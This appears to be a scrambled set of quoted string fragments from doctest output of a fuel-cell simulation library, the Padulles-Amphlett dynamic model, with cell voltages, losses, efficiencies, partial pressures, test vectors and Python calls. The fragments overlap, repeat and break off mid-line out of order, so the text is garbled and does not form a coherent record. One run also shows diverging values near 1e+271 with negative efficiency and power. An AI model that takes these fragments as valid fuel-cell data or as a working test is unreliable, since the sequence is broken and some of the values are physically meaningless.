: 0.4228725100457559 V Eta Concentration", ": 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I", "FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167", "atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V", "Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W", ": 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I", "PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 
0.19060257012370302 atm Power-Thermal", ": 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss", "7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V Eta Activation :", "0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I :", "Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463", ": 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E :", "0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC", "E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589", ": 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V", "0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC", "Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012", "W ########### I : 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118", "0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power", "PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal", "1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration :", "W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216", "PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E", "Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V", ": 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2", ": 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E :", "4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm 
PH2O : 0.2424064638374358", "Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2", ": 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC", "0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage", "0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage", "2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064", "0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I :", "0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I :", ": 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 :", "0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC", ": 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V Eta Activation", ": 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I", "PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal", ": 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I", ": 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I", "Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704", "atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... 
Warning : The", "PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ###########", "0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523", "PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ###########", "V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic", ": 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2", "1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V Eta Activation :", "E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073", "Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V", "0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I :", "0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I :", "0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V Eta Activation :", "0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage", "0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss :", ": 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal :", "PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal", "0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I :", "V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage :", ": 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 :", "Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087", "PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 
atm Power-Thermal : 1.1623111227088154 W ###########", "Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic :", "0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC", "Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency :", "atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W", "FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186", "V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic", ": 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V", "W ########### Report is generating ... Warning : The value of I(>0.1) leads", ": 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I", "V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency", "Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W", "atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1", "atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W", "Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193", "PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal", "atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W", "W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872", "V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage :", "########### I : 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V", "Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 
W FC Voltage : 4.909163097279392 V", "FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014", "V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm", "0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss :", "atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V", ">>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)", "PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E", "V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency", "PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E", "3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration :", "atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W", "0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power", ": 4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O :", "Simulation ########### Analyzing . . . 
I : 0.1 E : 6.0684154992732005 V", "PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ###########", "########### I : 3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V", ": 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration", "0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss :", "FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843", "9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage", ": 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V", "0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC", "0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862", ": 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E :", "atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W", "9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 :", "E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05", "V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency", "0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503", ": 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E :", "Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W", ": 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC", ": 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC", "PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 
atm Power-Thermal : 0.9650580567185031 W ###########", "E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485", "Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency :", "0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I :", "########### I : 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V", "0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC", "Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic :", "V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm", "V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic", ": 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC", ": 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC", "W ########### I : 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093", "W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875", ": 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration", "V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm", ": 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC", "0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I :", ">>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>>", "atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8", "Voltage : 4.335978606366966 V Loss : 
0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O", "Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348", ": 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O :", ": 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC", "########### I : 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V", "0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss :", ": 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V", "atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7", ": 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V", "0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152", "4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931", "FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378", "Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488", "FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm", ": 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC", "E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145", "E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05", "6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta", "0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss :", "Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043", 
"PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9 E", "1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration :", "N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . .", "V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency", ": 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I", "FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485", ": 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2", "V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm", "W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429", "Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V", ": 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V", "0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811", "Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W", ": 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V", ": 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal :", "6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 :", "PH2O : 0.24242375743276434 atm PO2 : 
0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ###########", "Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency :", ": 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration", ": 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 :", ": 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration", "atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W", "Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing .", ": 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss", "W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127", "W ########### I : 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945", "is generating ... Done! 
>>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6", ": 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V Eta Activation", "Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V", "4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502", ": 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC", ">>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>>", "Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic :", "Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V", "V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power :", ": 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal :", "Analyzing . . . 
I : 0.1 E : 6.14455344314445 V Eta Activation", ": 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 :", ": 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration", "W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852", ": 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal :", ": 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V", "Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270", "Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency :", ": 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V", "0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I :", "V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency", ": 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V", "V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm", ". . . 
I : 0.1 E : 6.0684154992732005 V Eta Activation :", "Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency :", "FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm", "V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency", "FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm", "I : 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta", "atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1", "6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V Eta Activation :", "Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W", "Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency :", "PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E", "0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663", "PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ###########", "atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W", "V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm", ": 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2", ": 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V Eta Activation", "V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power :", "PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ###########", "Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701", "0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 
atm PO2 : 0.19054704025631486", "0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219", "Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298", "W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983", "PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ###########", ": 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E :", "Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716", "Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W", "0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage", ": 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2", ": 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC", ": 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E :", "V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power :", "V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage :", ": 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss", "0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss :", ": 4.519750111503576 W ########### I : 2.3 E : 6.068381657907269 V Eta Activation", "Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178", "W ########### I : 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834", "V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic", "Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W", ": 
0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V Eta Activation", ": 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal :", "Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic :", ": 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal :", "Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4,", "Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency :", "Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2", "Power-Thermal : 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V Eta", "V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage :", ": 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2", "W ########### I : 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194", "FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm", "Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic :", "atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E : 6.068389351849069 V", "Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V", "E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318", "########### Report is generating ... Done! 
>>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>>", "4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127", "V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm", "0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I :", "atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4", "0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss :", "FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm", "Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency :", "Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V", "W ########### I : 0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603", ": 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 :", ": 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V", "atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E : 